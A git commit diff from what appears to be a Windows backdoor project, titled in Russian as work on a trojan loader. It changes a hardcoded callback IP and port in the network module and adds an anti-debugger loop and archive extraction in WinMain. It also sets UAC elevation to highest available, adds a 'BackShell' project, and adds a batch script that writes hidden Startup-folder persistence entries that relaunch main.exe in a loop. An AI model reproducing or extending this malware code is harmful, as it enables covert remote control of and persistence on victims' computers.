Делаю загрузчик трояна

This commit is contained in:
Данил
2024-09-03 20:30:55 +07:00
parent a5bc6af93b
commit 464c7094c9
53 changed files with 66 additions and 55 deletions
+3 -5
View File
@@ -1,5 +1,3 @@
const char* msg = "LS0tIC0uIC4gIC0uIC4uIC0tLiAuLi4uIC0gLS0uLi0tICAuLiAgLS4tLiAtLS0gLi4tIC4tLi4gLS4uIC0uIC4tLS0tLiAtICAuLi4gLi0uLiAuIC4gLi0tLiAuLS4tLi0gIC4uICAtLi0gLiAuLS0uIC0gIC4tLi4gLS0tIC0tLSAtLi0gLi4gLS4gLS0uICAuLSAtICAtIC4uLi4gLiAgLi0tLiAtLS0gLi0uIC0gLi0uIC4tIC4uIC0gIC0gLi4uLiAuLSAtICAuLS0gLi0gLi4uICAtLi0uIC4uLi4gLiAuIC4tLiAuLi0uIC4uLSAuLS4uICAtLS0gLS4gIC0gLi4uLiAuICAuLS0gLi0gLi0uLiAuLS4uIC4tLi0uLSAgLi4gLS4gIC0gLi4uLiAuICAtLSAtLS0gLi0uIC0uIC4uIC0uIC0tLiAgLi4gIC4uLiAtIC4uIC4tLi4gLi0uLiAgLS0gLi0gLS4gLi0gLS0uIC4gLS4uICAtIC0tLSAgLi4tLiAuLSAuLS4uIC4tLi4gIC4tIC4uLiAuLS4uIC4gLiAuLS0uIC0tLi4tLSAgLi0gLS4gLS4uICAuLS0gLi4uLiAuIC0uICAuLiAgLi0tIC0tLSAtLi0gLiAgLi4tIC4tLS4gIC4uICAuLi4gLi0gLi0tICAuLSAgLi0tIC4uIC0uIC0uLiAtLS0gLi0tICAtLS0gLS4gIC0gLi4uLiAuICAuLi4tLSAuLi4uLSAtIC4uLi4gIC4uLS4gLi0uLiAtLS0gLS0tIC4tLiAgLi4gLS4gIC4tLS4gLi0uLiAuLSAtLi0uIC4gIC0tLSAuLi0uICAtIC4uLi4gLiAgLi0tLiAuLSAuLiAtLiAtIC4uIC0uIC0tLiAuLS4tLi0=";
#define _WINSOCK_DEPRECATED_NO_WARNINGS #define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <WinSock2.h> #include <WinSock2.h>
#pragma comment(lib,"Ws2_32.lib") #pragma comment(lib,"Ws2_32.lib")
@@ -12,9 +10,9 @@ const char* msg = "LS0tIC0uIC4gIC0uIC4uIC0tLiAuLi4uIC0gLS0uLi0tICAuLiAgLS4tLiAtL
// Çàìåíèòü IP è port // Çàìåíèòü IP è port
#pragma region Network #pragma region Network
const unsigned short int lengthIP = 12; const unsigned short int lengthIP = 15;
char InternetProtacol[lengthIP] = "081-057-/-5"; char InternetProtacol[lengthIP] = "036-34-144-104";
int port = 1111; int port = 1112;
SOCKADDR_IN addr; SOCKADDR_IN addr;
SOCKET Socket; SOCKET Socket;
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.39.33519:TargetPlatformVersion=10.0.22621.0: PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.40.33807:TargetPlatformVersion=10.0.22621.0:
Debug|x64|D:\Projects\Malwere\| Debug|x64|D:\Projects\Malwere\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.39.33519:TargetPlatformVersion=10.0.22621.0: PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.40.33807:TargetPlatformVersion=10.0.22621.0:
Release|x64|D:\Projects\Malwere\| Release|x64|D:\Projects\Malwere\|
Binary file not shown.
+3 -2
View File
@@ -1,5 +1,3 @@
const char* msg = "LS0tIC0uIC4gIC0uIC4uIC0tLiAuLi4uIC0gLS0uLi0tICAuLiAgLS4tLiAtLS0gLi4tIC4tLi4gLS4uIC0uIC4tLS0tLiAtICAuLi4gLi0uLiAuIC4gLi0tLiAuLS4tLi0gIC4uICAtLi0gLiAuLS0uIC0gIC4tLi4gLS0tIC0tLSAtLi0gLi4gLS4gLS0uICAuLSAtICAtIC4uLi4gLiAgLi0tLiAtLS0gLi0uIC0gLi0uIC4tIC4uIC0gIC0gLi4uLiAuLSAtICAuLS0gLi0gLi4uICAtLi0uIC4uLi4gLiAuIC4tLiAuLi0uIC4uLSAuLS4uICAtLS0gLS4gIC0gLi4uLiAuICAuLS0gLi0gLi0uLiAuLS4uIC4tLi0uLSAgLi4gLS4gIC0gLi4uLiAuICAtLSAtLS0gLi0uIC0uIC4uIC0uIC0tLiAgLi4gIC4uLiAtIC4uIC4tLi4gLi0uLiAgLS0gLi0gLS4gLi0gLS0uIC4gLS4uICAtIC0tLSAgLi4tLiAuLSAuLS4uIC4tLi4gIC4tIC4uLiAuLS4uIC4gLiAuLS0uIC0tLi4tLSAgLi0gLS4gLS4uICAuLS0gLi4uLiAuIC0uICAuLiAgLi0tIC0tLSAtLi0gLiAgLi4tIC4tLS4gIC4uICAuLi4gLi0gLi0tICAuLSAgLi0tIC4uIC0uIC0uLiAtLS0gLi0tICAtLS0gLS4gIC0gLi4uLiAuICAuLi4tLSAuLi4uLSAtIC4uLi4gIC4uLS4gLi0uLiAtLS0gLS0tIC4tLiAgLi4gLS4gIC4tLS4gLi0uLiAuLSAtLi0uIC4gIC0tLSAuLi0uICAtIC4uLi4gLiAgLi0tLiAuLSAuLiAtLiAtIC4uIC0uIC0tLiAuLS4tLi0=";
#define _WINSOCK_DEPRECATED_NO_WARNINGS #define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, "Ws2_32.lib") #pragma comment(lib, "Ws2_32.lib")
#include "NetDLL.h" #include "NetDLL.h"
@@ -15,6 +13,9 @@ void NetInit()
void MyConnect(SOCKADDR* addr, SOCKET* Socket) void MyConnect(SOCKADDR* addr, SOCKET* Socket)
{ {
if (WSAConnect(*Socket, addr, sizeof(*addr), NULL, NULL, NULL, NULL)) if (WSAConnect(*Socket, addr, sizeof(*addr), NULL, NULL, NULL, NULL))
{
std::cout << WSAGetLastError() << '\n';
exit(2); exit(2);
}
Sleep(10); Sleep(10);
} }
Binary file not shown.
+3 -1
View File
@@ -1,3 +1,5 @@
LINK : не найден или не выполнена сборка D:\Projects\Malwere\x64\Debug\NetDLL.dll при последней инкрементной компоновке; выполняется полная компоновка NetDLL.cpp
D:\Projects\Malwere\BackDoor\NetDLL\NetDLL.cpp(6,6): warning C4273: NetInit: несовместимое связывание dll
D:\Projects\Malwere\BackDoor\NetDLL\NetDLL.cpp(13,6): warning C4273: MyConnect: несовместимое связывание dll
Создается библиотека D:\Projects\Malwere\x64\Debug\NetDLL.lib и объект D:\Projects\Malwere\x64\Debug\NetDLL.exp Создается библиотека D:\Projects\Malwere\x64\Debug\NetDLL.lib и объект D:\Projects\Malwere\x64\Debug\NetDLL.exp
NetDLL.vcxproj -> D:\Projects\Malwere\x64\Debug\NetDLL.dll NetDLL.vcxproj -> D:\Projects\Malwere\x64\Debug\NetDLL.dll
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.39.33519:TargetPlatformVersion=10.0.22621.0: PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.40.33807:TargetPlatformVersion=10.0.22621.0:
Debug|x64|D:\Projects\Malwere\| Debug|x64|D:\Projects\Malwere\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+5 -2
View File
@@ -1,6 +1,9 @@
Создается библиотека D:\Projects\Malwere\x64\Release\NetDLL.lib и объект D:\Projects\Malwere\x64\Release\NetDLL.exp NetDLL.cpp
D:\Projects\Malwere\BackDoor\NetDLL\NetDLL.cpp(6,6): warning C4273: NetInit: несовместимое связывание dll
D:\Projects\Malwere\BackDoor\NetDLL\NetDLL.cpp(13,6): warning C4273: MyConnect: несовместимое связывание dll
Создается библиотека D:\Projects\Malwere\x64\Release\NetDLL.lib и объект D:\Projects\Malwere\x64\Release\NetDLL.exp
Создание кода Создание кода
0 of 2 functions ( 0.0%) were compiled, the rest were copied from previous compilation. 1 of 10 functions (10.0%) were compiled, the rest were copied from previous compilation.
0 functions were new in current compilation 0 functions were new in current compilation
0 functions had inline decision re-evaluated but remain unchanged 0 functions had inline decision re-evaluated but remain unchanged
Создание кода завершено Создание кода завершено
Binary file not shown.
@@ -1,2 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.39.33519:TargetPlatformVersion=10.0.22621.0: PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.40.33807:TargetPlatformVersion=10.0.22621.0:
Release|x64|D:\Projects\Malwere\| Release|x64|D:\Projects\Malwere\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1 -4
View File
@@ -1,15 +1,13 @@
const char* msg = "LS0tIC0uIC4gIC0uIC4uIC0tLiAuLi4uIC0gLS0uLi0tICAuLiAgLS4tLiAtLS0gLi4tIC4tLi4gLS4uIC0uIC4tLS0tLiAtICAuLi4gLi0uLiAuIC4gLi0tLiAuLS4tLi0gIC4uICAtLi0gLiAuLS0uIC0gIC4tLi4gLS0tIC0tLSAtLi0gLi4gLS4gLS0uICAuLSAtICAtIC4uLi4gLiAgLi0tLiAtLS0gLi0uIC0gLi0uIC4tIC4uIC0gIC0gLi4uLiAuLSAtICAuLS0gLi0gLi4uICAtLi0uIC4uLi4gLiAuIC4tLiAuLi0uIC4uLSAuLS4uICAtLS0gLS4gIC0gLi4uLiAuICAuLS0gLi0gLi0uLiAuLS4uIC4tLi0uLSAgLi4gLS4gIC0gLi4uLiAuICAtLSAtLS0gLi0uIC0uIC4uIC0uIC0tLiAgLi4gIC4uLiAtIC4uIC4tLi4gLi0uLiAgLS0gLi0gLS4gLi0gLS0uIC4gLS4uICAtIC0tLSAgLi4tLiAuLSAuLS4uIC4tLi4gIC4tIC4uLiAuLS4uIC4gLiAuLS0uIC0tLi4tLSAgLi0gLS4gLS4uICAuLS0gLi4uLiAuIC0uICAuLiAgLi0tIC0tLSAtLi0gLiAgLi4tIC4tLS4gIC4uICAuLi4gLi0gLi0tICAuLSAgLi0tIC4uIC0uIC0uLiAtLS0gLi0tICAtLS0gLS4gIC0gLi4uLiAuICAuLi4tLSAuLi4uLSAtIC4uLi4gIC4uLS4gLi0uLiAtLS0gLS0tIC4tLiAgLi4gLS4gIC4tLS4gLi0uLiAuLSAtLi0uIC4gIC0tLSAuLi0uICAtIC4uLi4gLiAgLi0tLiAuLSAuLiAtLiAtIC4uIC0uIC0tLiAuLS4tLi0=";
#include <Windows.h> #include <Windows.h>
#include "Virtualisetion.h" #include "Virtualisetion.h"
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
PSTR lpCmdLine, int nCmdShow) PSTR lpCmdLine, int nCmdShow)
//int main()
{ {
while(IsDebuggerPresent()) {} while(IsDebuggerPresent()) {}
system("7z.exe x main.ar -y"); system("7z.exe x main.ar -y");
system("7z.exe x module.ar -y");
const int SizeCode = 25; const int SizeCode = 25;
char Code[SizeCode] = { char Code[SizeCode] = {
@@ -25,6 +23,5 @@ int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
Syscall Syscall
}; };
VirtualStart(Code, SizeCode); VirtualStart(Code, SizeCode);
return 0; return 0;
} }
+8 -8
View File
@@ -111,9 +111,9 @@
<SubSystem>Windows</SubSystem> <SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<EnableUAC>false</EnableUAC> <EnableUAC>false</EnableUAC>
<UACExecutionLevel>AsInvoker</UACExecutionLevel> <UACExecutionLevel>HighestAvailable</UACExecutionLevel>
<AllowIsolation>false</AllowIsolation> <AllowIsolation>false</AllowIsolation>
<UACUIAccess>false</UACUIAccess> <UACUIAccess>true</UACUIAccess>
<RandomizedBaseAddress>false</RandomizedBaseAddress> <RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention> <DataExecutionPrevention>false</DataExecutionPrevention>
<AdditionalDependencies>$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies>
@@ -158,9 +158,9 @@
<OptimizeReferences>true</OptimizeReferences> <OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<EnableUAC>false</EnableUAC> <EnableUAC>false</EnableUAC>
<UACExecutionLevel>AsInvoker</UACExecutionLevel> <UACExecutionLevel>HighestAvailable</UACExecutionLevel>
<AllowIsolation>false</AllowIsolation> <AllowIsolation>false</AllowIsolation>
<UACUIAccess>false</UACUIAccess> <UACUIAccess>true</UACUIAccess>
<RandomizedBaseAddress>false</RandomizedBaseAddress> <RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention> <DataExecutionPrevention>false</DataExecutionPrevention>
<AdditionalDependencies>$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies>
@@ -198,9 +198,9 @@
<SubSystem>Windows</SubSystem> <SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<EnableUAC>false</EnableUAC> <EnableUAC>false</EnableUAC>
<UACExecutionLevel>AsInvoker</UACExecutionLevel> <UACExecutionLevel>HighestAvailable</UACExecutionLevel>
<AllowIsolation>false</AllowIsolation> <AllowIsolation>false</AllowIsolation>
<UACUIAccess>false</UACUIAccess> <UACUIAccess>true</UACUIAccess>
<RandomizedBaseAddress>false</RandomizedBaseAddress> <RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention> <DataExecutionPrevention>false</DataExecutionPrevention>
<AdditionalDependencies>$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies>
@@ -245,9 +245,9 @@
<OptimizeReferences>true</OptimizeReferences> <OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<EnableUAC>false</EnableUAC> <EnableUAC>false</EnableUAC>
<UACExecutionLevel>AsInvoker</UACExecutionLevel> <UACExecutionLevel>HighestAvailable</UACExecutionLevel>
<AllowIsolation>false</AllowIsolation> <AllowIsolation>false</AllowIsolation>
<UACUIAccess>false</UACUIAccess> <UACUIAccess>true</UACUIAccess>
<RandomizedBaseAddress>false</RandomizedBaseAddress> <RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention> <DataExecutionPrevention>false</DataExecutionPrevention>
<AdditionalDependencies>$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>$(CoreLibraryDependencies);%(AdditionalDependencies)</AdditionalDependencies>
+1
View File
@@ -11,5 +11,6 @@
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor> <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
<LocalDebuggerDebuggerType>Auto</LocalDebuggerDebuggerType>
</PropertyGroup> </PropertyGroup>
</Project> </Project>
+1 -5
View File
@@ -1,11 +1,7 @@
cl : командная строка warning D9035: использование параметра "Zc:forScope-" нежелательно, он будет удален в следующих выпусках cl : командная строка warning D9035: использование параметра "Zc:forScope-" нежелательно, он будет удален в следующих выпусках
main.cpp main.cpp
D:\Projects\Malwere\BackDoor\main\Virtualisetion.h(40,46): warning C4244: return: преобразование "__int64" в "int", возможна потеря данных D:\Projects\Malwere\BackDoor\main\Virtualisetion.h(40,46): warning C4244: return: преобразование "__int64" в "int", возможна потеря данных
(компиляция исходного файла "main.cpp") D:\Projects\Malwere\BackDoor\main\Virtualisetion.h(90,19): warning C4244: инициализация: преобразование "__int64" в "int", возможна потеря данных
D:\Projects\Malwere\BackDoor\main\Virtualisetion.h(108,19): warning C4244: инициализация: преобразование "__int64" в "int", возможна потеря данных
(компиляция исходного файла "main.cpp")
LINK : warning LNK4075: не учитывается "/INCREMENTAL" из-за спецификации "/OPT:REF" LINK : warning LNK4075: не учитывается "/INCREMENTAL" из-за спецификации "/OPT:REF"
main.obj : warning LNK4075: не учитывается "/EDITANDCONTINUE" из-за спецификации "/OPT:REF" main.obj : warning LNK4075: не учитывается "/EDITANDCONTINUE" из-за спецификации "/OPT:REF"
main.vcxproj -> D:\Projects\Malwere\x64\Debug\main.exe main.vcxproj -> D:\Projects\Malwere\x64\Debug\main.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.39.33519:TargetPlatformVersion=10.0.22621.0: PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.40.33807:TargetPlatformVersion=10.0.22621.0:
Debug|x64|D:\Projects\Malwere\| Debug|x64|D:\Projects\Malwere\|
Binary file not shown.
Binary file not shown.
+1 -5
View File
@@ -1,10 +1,6 @@
cl : командная строка warning D9035: использование параметра "Zc:forScope-" нежелательно, он будет удален в следующих выпусках cl : командная строка warning D9035: использование параметра "Zc:forScope-" нежелательно, он будет удален в следующих выпусках
main.cpp main.cpp
D:\Projects\Malwere\BackDoor\main\Virtualisetion.h(40,46): warning C4244: return: преобразование "__int64" в "int", возможна потеря данных D:\Projects\Malwere\BackDoor\main\Virtualisetion.h(40,46): warning C4244: return: преобразование "__int64" в "int", возможна потеря данных
(компиляция исходного файла "main.cpp") D:\Projects\Malwere\BackDoor\main\Virtualisetion.h(90,19): warning C4244: инициализация: преобразование "__int64" в "int", возможна потеря данных
D:\Projects\Malwere\BackDoor\main\Virtualisetion.h(96,19): warning C4244: инициализация: преобразование "__int64" в "int", возможна потеря данных
(компиляция исходного файла "main.cpp")
LINK : указан параметр /LTCG, но не требуется создание кода; удалите /LTCG из командной строки компоновки для повышения производительности компоновщика LINK : указан параметр /LTCG, но не требуется создание кода; удалите /LTCG из командной строки компоновки для повышения производительности компоновщика
main.vcxproj -> D:\Projects\Malwere\x64\Release\main.exe main.vcxproj -> D:\Projects\Malwere\x64\Release\main.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.39.33519:TargetPlatformVersion=10.0.22621.0: PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.40.33807:TargetPlatformVersion=10.0.22621.0:
Release|x64|D:\Projects\Malwere\| Release|x64|D:\Projects\Malwere\|
Binary file not shown.
+23 -10
View File
@@ -15,7 +15,11 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "mandatory", "mandatory", "{
EndProject EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Upload", "BackDoor\Upload\Upload.vcxproj", "{3E01A79C-7304-4667-A77A-FAA55379EB89}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Upload", "BackDoor\Upload\Upload.vcxproj", "{3E01A79C-7304-4667-A77A-FAA55379EB89}"
EndProject EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Load", "Load\Load.vcxproj", "{93BF7066-3967-444F-B965-D53469E75E2C}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SwapWallpaper", "SwapWallpaper\SwapWallpaper.vcxproj", "{B61214EB-DFD0-4F92-BEF6-E77F62844FF3}"
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "v2", "v2", "{AC477C67-82F8-4291-A79A-D4872F731C69}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BackShell", "BackShell\BackShell.vcxproj", "{1D21965D-B5E8-47FD-AEDC-6E5AA2E45471}"
EndProject EndProject
Global Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution GlobalSection(SolutionConfigurationPlatforms) = preSolution
@@ -57,14 +61,22 @@ Global
{3E01A79C-7304-4667-A77A-FAA55379EB89}.Release|x64.Build.0 = Release|x64 {3E01A79C-7304-4667-A77A-FAA55379EB89}.Release|x64.Build.0 = Release|x64
{3E01A79C-7304-4667-A77A-FAA55379EB89}.Release|x86.ActiveCfg = Release|Win32 {3E01A79C-7304-4667-A77A-FAA55379EB89}.Release|x86.ActiveCfg = Release|Win32
{3E01A79C-7304-4667-A77A-FAA55379EB89}.Release|x86.Build.0 = Release|Win32 {3E01A79C-7304-4667-A77A-FAA55379EB89}.Release|x86.Build.0 = Release|Win32
{93BF7066-3967-444F-B965-D53469E75E2C}.Debug|x64.ActiveCfg = Debug|x64 {B61214EB-DFD0-4F92-BEF6-E77F62844FF3}.Debug|x64.ActiveCfg = Debug|x64
{93BF7066-3967-444F-B965-D53469E75E2C}.Debug|x64.Build.0 = Debug|x64 {B61214EB-DFD0-4F92-BEF6-E77F62844FF3}.Debug|x64.Build.0 = Debug|x64
{93BF7066-3967-444F-B965-D53469E75E2C}.Debug|x86.ActiveCfg = Debug|Win32 {B61214EB-DFD0-4F92-BEF6-E77F62844FF3}.Debug|x86.ActiveCfg = Debug|Win32
{93BF7066-3967-444F-B965-D53469E75E2C}.Debug|x86.Build.0 = Debug|Win32 {B61214EB-DFD0-4F92-BEF6-E77F62844FF3}.Debug|x86.Build.0 = Debug|Win32
{93BF7066-3967-444F-B965-D53469E75E2C}.Release|x64.ActiveCfg = Release|x64 {B61214EB-DFD0-4F92-BEF6-E77F62844FF3}.Release|x64.ActiveCfg = Release|x64
{93BF7066-3967-444F-B965-D53469E75E2C}.Release|x64.Build.0 = Release|x64 {B61214EB-DFD0-4F92-BEF6-E77F62844FF3}.Release|x64.Build.0 = Release|x64
{93BF7066-3967-444F-B965-D53469E75E2C}.Release|x86.ActiveCfg = Release|Win32 {B61214EB-DFD0-4F92-BEF6-E77F62844FF3}.Release|x86.ActiveCfg = Release|Win32
{93BF7066-3967-444F-B965-D53469E75E2C}.Release|x86.Build.0 = Release|Win32 {B61214EB-DFD0-4F92-BEF6-E77F62844FF3}.Release|x86.Build.0 = Release|Win32
{1D21965D-B5E8-47FD-AEDC-6E5AA2E45471}.Debug|x64.ActiveCfg = Debug|x64
{1D21965D-B5E8-47FD-AEDC-6E5AA2E45471}.Debug|x64.Build.0 = Debug|x64
{1D21965D-B5E8-47FD-AEDC-6E5AA2E45471}.Debug|x86.ActiveCfg = Debug|Win32
{1D21965D-B5E8-47FD-AEDC-6E5AA2E45471}.Debug|x86.Build.0 = Debug|Win32
{1D21965D-B5E8-47FD-AEDC-6E5AA2E45471}.Release|x64.ActiveCfg = Release|x64
{1D21965D-B5E8-47FD-AEDC-6E5AA2E45471}.Release|x64.Build.0 = Release|x64
{1D21965D-B5E8-47FD-AEDC-6E5AA2E45471}.Release|x86.ActiveCfg = Release|Win32
{1D21965D-B5E8-47FD-AEDC-6E5AA2E45471}.Release|x86.Build.0 = Release|Win32
EndGlobalSection EndGlobalSection
GlobalSection(SolutionProperties) = preSolution GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE HideSolutionNode = FALSE
@@ -75,7 +87,8 @@ Global
{164A5605-AD23-4181-89C4-FA8774746731} = {BBCDCCD4-1868-44A9-B2D1-314B7916453B} {164A5605-AD23-4181-89C4-FA8774746731} = {BBCDCCD4-1868-44A9-B2D1-314B7916453B}
{BBCDCCD4-1868-44A9-B2D1-314B7916453B} = {C5FF1EFF-014D-4975-AD38-230A0A0826FB} {BBCDCCD4-1868-44A9-B2D1-314B7916453B} = {C5FF1EFF-014D-4975-AD38-230A0A0826FB}
{3E01A79C-7304-4667-A77A-FAA55379EB89} = {C5FF1EFF-014D-4975-AD38-230A0A0826FB} {3E01A79C-7304-4667-A77A-FAA55379EB89} = {C5FF1EFF-014D-4975-AD38-230A0A0826FB}
{93BF7066-3967-444F-B965-D53469E75E2C} = {C5FF1EFF-014D-4975-AD38-230A0A0826FB} {AC477C67-82F8-4291-A79A-D4872F731C69} = {C5FF1EFF-014D-4975-AD38-230A0A0826FB}
{1D21965D-B5E8-47FD-AEDC-6E5AA2E45471} = {AC477C67-82F8-4291-A79A-D4872F731C69}
EndGlobalSection EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {7F3C36FE-6D65-4523-A257-09FF14B81C17} SolutionGuid = {7F3C36FE-6D65-4523-A257-09FF14B81C17}
-6
View File
@@ -1,6 +0,0 @@
net session >nul 2>&1
if %errorLevel% == 0 (
echo Yes
) else (
echo No
)
+11 -1
View File
@@ -1,2 +1,12 @@
@echo off @echo off
echo start %CD%\main.exe > "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.bat"
echo :loop > "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\2.bat"
echo start %CD%\main.exe >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\2.bat"
echo timeout 5 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\2.bat"
echo goto loop >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\2.bat"
echo Set WshShell = CreateObject(^"WScript.Shell^") > "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.vbs"
echo WshShell.Run chr(34) ^& ^"C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\2.bat^" ^& Chr(34), 0 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.vbs"
echo Set WshShell = Nothing >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.vbs"
"C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.vbs"